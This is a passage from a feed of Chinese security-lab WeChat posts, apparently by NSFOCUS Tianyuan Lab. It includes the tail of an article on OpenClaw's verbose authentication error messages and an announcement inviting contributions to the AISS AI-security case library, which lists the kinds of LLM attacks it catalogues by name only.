leaf="">在 OpenClaw 这样的控制平面系统中，失败响应提供了远比成功响应更多的语义信息。</span></strong></p></div></div><div style="text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">传统安全思路是隐藏错误细节——报错越模糊越好，以免泄露内部信息。但 OpenClaw 选择了</span><strong style="box-sizing: border-box;"><span leaf="">详细的业务级错误回显</span></strong><span leaf="">，源于其开发者体验优先的设计哲学：当用户遇到认证问题时，系统需要精确告诉他&#34;为什么失败&#34;以及&#34;如何修复&#34;。这种设计降低了运维门槛，但在安全视角下，但在安全的视角下，这些详细的错误回显无意中暴露了系统内部逻辑和认证流程。</span></p></div></div></div><div style="margin: 54px 0% 10px;text-align: center;justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 95%;vertical-align: top;border-style: solid;border-width: 2px;border-color: rgb(67, 146, 117);padding: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 11px;margin: -44px 0% 0px;box-sizing: border-box;"><div style="width: 7em;height: 7em;display: inline-block;vertical-align: middle;border-radius: 100%;background-color: rgb(255, 255, 255);margin: 0px -2.18em 0px -2.2em;box-sizing: border-box;"><div data-cacheurl="" data-remoteid="" style="width: 6em;height: 6em;margin: 0.5em auto;border-radius: 100%;background-position: 50.9993% 50%;background-repeat: no-repeat;background-size: 170.274%;border-width: 3px;border-style: solid;border-color: rgb(255, 255, 255);overflow: hidden;box-sizing: border-box;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=d60aaca3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jClbVTOy6sqceQc0HYtGavRCODSamp8fWWS5yEOW0b9HTQYjt6pGeYGyfmZ5cSiaBUkSVOABzBOrOPpvPibkvL5kXPibkFV9kZYTq8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><p style="width: 100%;height: 100%;overflow: hidden;line-height: 0;max-width: 100%;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9722222" data-s="300,640" data-type="png" data-w="1080" style="width: 100%;height: 100%;opacity: 0;box-sizing: border-box;" data-imgfileid="100011229" src="https://wechat2rss.xlab.app/img-proxy/?k=7fc13326&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FuZT6kWW1jCn0nTulN2aml93dEhAQia0QiaicFbPw6rvdY0a36bPcDtAN5GKVXEu2k0aUSfVib3EvbFpbKdkyUNcs76L6NcolhUeuyjggY8htGCk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div><div style="justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 10px 10px 20px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.8;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">绿盟科技天元实验室</span></strong><span leaf="">专注于新型实战化攻防对抗技术研究。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究目标包括：漏洞利用技术、防御绕过技术、攻击隐匿技术、攻击持久化技术等蓝军技术，以及攻击技战术、攻击框架的研究。涵盖Web安全、终端安全、AD安全、云安全等多个技术领域的攻击技术研究，以及工业互联网、车联网等业务场景的攻击技术研究。通过研究攻击对抗技术，从攻击视角提供识别风险的方法和手段，为威胁对抗提供决策支撑。</span></p></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011226" src="https://wechat2rss.xlab.app/img-proxy/?k=fbf42feb&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FuZT6kWW1jCnotglZTa4bdzQg6OzfafvDW2ZeKIgy4IRA0qK9urElQOKyMsHN984TPt9VDiaJ73XkicvTuaXB0oEibmXwNIHicOkbHGyykwDSdSQ%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011227" src="https://wechat2rss.xlab.app/img-proxy/?k=42f4b5c8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCnQcCIcL1Bp0ceXlqeZTicp5oPtyXnLibrXXfDhApFu72CsmBW5pFb0hczsDsZtk3M7t88kvpTPRRAPuU6tgk2xwK4jJMy5ETAyU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方攻防交流群</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">网络安全一手资讯</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">攻防技术答疑解惑</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">扫码加好友即可拉群</span></p></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=d746f188&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzkyMTI0NjA3OA%3D%3D%26mid%3D2247494878%26idx%3D1%26sn%3D6b55e606fbcfc30f1d3f0022d7e3b6b6">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 30 Mar 2026 18:01:00 +0800</pubDate>
    </item>
    <item>
      <title>AISS社区案例库开放：欢迎社区共建</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzkyMTI0NjA3OA==&amp;mid=2247494891&amp;idx=1&amp;sn=fb48fbde89f2d1be8b5a6dd77d35a27a</link>
      <description>AISS社区案例库开放：欢迎社区共建</description>
      <content:encoded><![CDATA[<p>原创 <span>天元实验室</span> <span>2026-03-27 18:00</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=34f27e4d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FTPGibEO8KBwasInfGT2H4qxCiam76dFfIM55dQIaaTtzZ45ibWlzx59tU2Lf6k7VqMSPkcXftk5icXl72RFGeXTJQg%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>AISS社区案例库开放：欢迎社区共建</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="display: flex;flex-flow: row;margin: 7px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;width: 20px;vertical-align: top;flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;background-color: rgb(67, 146, 117);box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="gif" data-w="300" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011235" src="https://wechat2rss.xlab.app/img-proxy/?k=0ad770e5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FuZT6kWW1jClLicdFvNKhojVpDoUuzJ5IDQxMjOUJjkib9aVS8QMmXNibtk4Y7XOIiajsprjicWvZcO53XiaK5ZTicEd67IdeVRLYLGqxFWL4eDfcTU%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="font-size: 20px;line-height: 1;letter-spacing: 1px;padding: 0px 8px;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">引言</span></b></p></div></div></div><div style="display: flex;flex-flow: row;margin: 0px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;border-left: 3px solid rgb(67, 146, 117);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;border-bottom: 3px solid rgb(67, 146, 117);border-bottom-right-radius: 0px;padding: 0px 10px 10px 20px;box-sizing: border-box;"><div style="color: rgb(106, 106, 106);line-height: 1.8;letter-spacing: 1px;padding: 0px;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AISS（AI Safety And Security）绿盟大模型安全智链社区自2024年底上线以来，搭建起一个开放共享的AI安全知识平台。社区以“AISS大模型安全风险矩阵”为核心，构建知识库，覆盖大模型全生命周期的安全威胁，并整理系统化的风险分类与缓解措施。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在此基础上，社区新增案例库模块，作为风险矩阵和知识库的重要补充。该模块收集开源、公开可参考的AI安全相关案例，帮助社区成员直观对照风险矩阵中的各类风险点，加深对威胁的理解。</span></p></div></div></div><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011239" data-ratio="0.7796296" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=05289a1d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCkT3kOxfsQ8ib7RmAYiceQibicvniclFDCkCyg1Z5zQ2nmoJINENYmE1tnlZpVpyS5mfkCeMxPkd8Lde2tZCnHBibCyNuThSBM0WnE2o%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: center;font-size: 12px;color: rgb(160, 160, 160);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AISS绿盟大模型智链社区安全风险矩阵</span></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">01 案例库已收录方向（部分）</span></span></strong></p></div></div></div></div><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">越狱类：</span></strong><span leaf="">角色扮演越狱、CoT推理链注入、多模态越狱等</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">Prompt攻击：</span></strong><span leaf="">直接/间接提示注入、零点击注入、Agent命令链攻击等</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">RAG/知识库：</span></strong><span leaf="">RAG数据投毒、 Tool Poisoning / MCP工具描述投毒等</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">模型与供应链：</span></strong><span leaf="">序列化后门、模型投毒、Agent技能市场投毒等</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">隐私与数据泄露：</span></strong><span leaf="">企业机密泄露、训练数据提取、凭据外泄等</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">基础设施与部署安全：</span></strong><span leaf="">SSRF/XSS、DDoS、反序列化RCE等</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">身份与访问安全：</span></strong><span leaf="">账号接管、越权调用、未授权访问等</span></p></li><li style="box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">AI辅助攻击：</span></strong><span leaf="">AI自主发现0Day、LLM加速渗透、AI生成恶意软件_x0005_等</span></p></li></ul><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">02 投稿指南</span></span></strong></p></div></div></div></div><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">社区欢迎成员补充更多开源/公开案例，特别是：</span></strong></p><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">覆盖主流模型（包括国内开源/闭源模型）的典型示例</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">多模态场景下的公开攻击/失效案例</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">与风险矩阵高度匹配、可作为佐证的开源案例</span></p></li></ul><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">凡与 AI 安全相关的真实案例、研究复现或公开事件，均欢迎补充与完善。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">投稿流程：</span></strong></p><ol style="list-style-type: decimal;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-1"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">登录AISS社区（AISS绿盟大模型安全智链社区）</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">进入“案例库” → 点击“提交案例”</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">按表单提示填写信息</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">提交后 1-3 个工作日审核通过</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">审核通过即纳入案例库公开显示</span></p></li></ol><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011238" data-ratio="0.6722222" data-s="300,640" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=08a8a4df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCkqqU6P2OQPaYoEDBcLsTNAMpI63gf6E47cPmeHomxlzDCiczX9nwhjwichEDeplnh4jsuHBm8cP2OZsbnykvBRwvEwicKLctMjLk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div><div style="text-align: center;font-size: 12px;color: rgb(160, 160, 160);box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AI安全案例库</span></p></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">03 投稿激励</span></span></strong></p></div></div></div></div><ul style="list-style-type: disc;box-sizing: border-box;padding-left: 20px;list-style-position: outside;" class="list-paddingleft-2"><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">在社区案例库、微信公众号等进行推荐展示</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">署名感谢贡献者</span></p></li><li style="box-sizing: border-box;"><p style="word-break: break-all;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">部分优秀案例会被纳入大模型安全知识库风险的“攻击案例”栏目</span></p></li></ul><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: bottom;width: auto;align-self: flex-end;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 10px 0% 0px;box-sizing: border-box;"><div style="font-family: Optima-Regular, PingFangTC-light;color: rgb(67, 146, 117);font-size: 18px;line-height: 1;text-align: justify;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="box-sizing: border-box;"><span leaf="">04 结语</span></span></strong></p></div></div></div></div><div style="box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AISS社区的发展，需要每一位AI安全探索者的共同参与。无论是研究中发现的开源案例，还是工作中遇到的可分享示例，都欢迎提交，一起丰富国内AI安全开源案例资源。让更多从业者依托公开案例加快学习步伐，强化防御体系。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">社区地址：<a href="https://aiss.nsfocus.com" target="_blank">https://aiss.nsfocus.com</a></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">案例库入口：<a href="https://aiss.nsfocus.com/#/cases" target="_blank">https://aiss.nsfocus.com/#/cases</a></span></p></div><div style="text-align: right;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">AISS大模型安全智链社区</span></p></div><div style="text-align: right;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年3月</span></p></div><div style="margin: 54px 0% 10px;text-align: center;justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 95%;vertical-align: top;border-style: solid;border-width: 2px;border-color: rgb(67, 146, 117);padding: 0px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 11px;margin: -44px 0% 0px;box-sizing: border-box;"><div style="width: 7em;height: 7em;display: inline-block;vertical-align: middle;border-radius: 100%;background-color: rgb(255, 255, 255);margin: 0px -2.18em 0px -2.2em;box-sizing: border-box;"><div data-cacheurl="" data-remoteid="" style="width: 6em;height: 6em;margin: 0.5em auto;border-radius: 100%;background-position: 50.9993% 50%;background-repeat: no-repeat;background-size: 170.274%;border-width: 3px;border-style: solid;border-color: rgb(255, 255, 255);overflow: hidden;box-sizing: border-box;background-image: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=23066b41&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jClbCotN6Cia00vdNxHoV7Cia5TsDj2XzALUJasMiaCGgud7sJwCdO8ex9MFWf4pWE94DsCrrCtAlE0NBm1oayQyMVWibPTF9ow3Bic8%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg&#34;);"><p style="width: 100%;height: 100%;overflow: hidden;line-height: 0;max-width: 100%;box-sizing: border-box;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100011237" data-ratio="0.9722222" data-s="300,640" style="width: 100%;height: 100%;opacity: 0;box-sizing: border-box;" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=5a733f70&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jCliaSqm0bMkibiaeI0vqibiaUdX5Y9XxWSvZCE4nIqrRKeCVtHHp9dJicGKN1PQLzwBbeSS5PUiaj8NxO5tooYBrxen9U56icJx5zpZt5M%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div><div style="justify-content: center;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 10px 10px 20px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.8;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">绿盟科技天元实验室</span></strong><span leaf="">专注于新型实战化攻防对抗技术研究。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">研究目标包括：漏洞利用技术、防御绕过技术、攻击隐匿技术、攻击持久化技术等蓝军技术，以及攻击技战术、攻击框架的研究。涵盖Web安全、终端安全、AD安全、云安全等多个技术领域的攻击技术研究，以及工业互联网、车联网等业务场景的攻击技术研究。通过研究攻击对抗技术，从攻击视角提供识别风险的方法和手段，为威胁对抗提供决策支撑。</span></p></div></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1" data-s="300,640" data-type="jpeg" data-w="344" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011236" src="https://wechat2rss.xlab.app/img-proxy/?k=75eb31a0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FuZT6kWW1jCnAicbflD2Y3RTXZSCzEOcPvlicyRichyuUmxOxTzgiafNQtsMj2vP07XXB700RgMNia07y4ictu7DibN3RHTrtXn1kPPWC2DibQR4p65Y%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">M01N Team公众号</span></strong></p></div><div style="margin: 10px 0%;box-sizing: border-box;"><div style="font-size: 13px;color: rgb(160, 160, 160);text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 3px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">聚焦高级攻防对抗热点技术</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">绿盟科技蓝军技术研究战队</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 10px 0%;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;flex: 20 20 0%;align-self: flex-start;height: auto;box-sizing: border-box;"><div style="margin: -5px 0%;text-align: justify;justify-content: flex-start;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;width: 100%;vertical-align: top;padding: 0px 6px;align-self: flex-start;flex: 0 0 auto;box-sizing: border-box;"><div style="text-align: center;margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.9145907" data-s="300,640" data-type="png" data-w="562" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100011240" src="https://wechat2rss.xlab.app/img-proxy/?k=34587487&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FuZT6kWW1jClNONHvibdPuXfLuQboich9tZsno6lp0ACJRR1UVKQ9yyajwbOhRRcic24WGKlwBQA5zdVm5O5V6CnO84Wh8rfvDiaxRdjlvEDp1fs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p></div></div></div></div><div style="display: inline-block;vertical-align: top;width: auto;flex: 100 100 0%;align-self: flex-start;height: auto;padding: 0px 0px 0px 20px;box-sizing: border-box;"><div style="color: rgb(67, 146, 117);font-size: 19px;letter-spacing: 2px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: 